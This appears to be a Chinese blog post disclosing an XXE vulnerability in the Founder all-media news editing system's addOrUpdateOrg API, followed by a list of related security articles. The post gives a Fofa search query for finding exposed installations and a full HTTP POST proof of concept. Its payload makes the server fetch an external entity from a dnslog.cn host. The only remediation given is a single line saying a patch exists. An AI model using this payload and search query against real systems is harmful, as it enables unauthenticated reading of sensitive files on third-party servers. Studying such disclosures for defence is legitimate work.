方正畅享全媒体新闻采编系统 addOrUpdateOrg xxe漏洞

0x01 产品描述:

方正畅享全媒体新闻采编系统是一个集指挥中心、采集中心、编辑中心、发布中心、绩效考核中心和资料中心为一体的全媒体新闻采编系统‌,主要应用于媒体行业的深度融合,通过大数据和AI技术,实现新闻生产的策、采、编、发、存、传、评的全流程管理‌

0x02 漏洞描述:

方正畅享全媒体新闻采编系统 addOrUpdateOrg 接口处存在XML实体注入漏洞,未经身份认证的攻击者可以利用此漏洞读取系统内部敏感文件,获取敏感信息,使系统处于极不安全的状态。
0x03 搜索语句:

Fofa:app="FOUNDER-全媒体采编系统"

0x04 漏洞复现:

复制代码
POST /newsedit/api/orgUser/addOrUpdateOrg HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close

xmlStr=%3C!DOCTYPE%20root%20%5B%20%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http://gli10h.dnslog.cn/%22%3E%20%25remote;%5D%3E

0x05 修复建议:

厂商已发布补丁 请即时修复。

相关推荐
Clownseven4 小时前
云端备份与恢复策略:企业如何选择最安全的备份解决方案
安全
薄荷椰果抹茶6 小时前
【网络安全基础】第六章---Web安全需求
安全·web安全
HumanRisk14 小时前
降低网络安全中的人为风险:以人为本的路径
网络·安全·web安全
运维开发王义杰14 小时前
金融安全生命线:用AWS EventBridge和CloudTrail构建主动式入侵检测系统
安全·金融·aws
安全系统学习16 小时前
系统安全之大模型案例分析
前端·安全·web安全·网络安全·xss
加密狗复制模拟18 小时前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
galaxylove19 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu19 小时前
主流零信任安全产品深度介绍
运维·网络·安全
江苏思维驱动智能研究院有限公司19 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
小能喵21 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux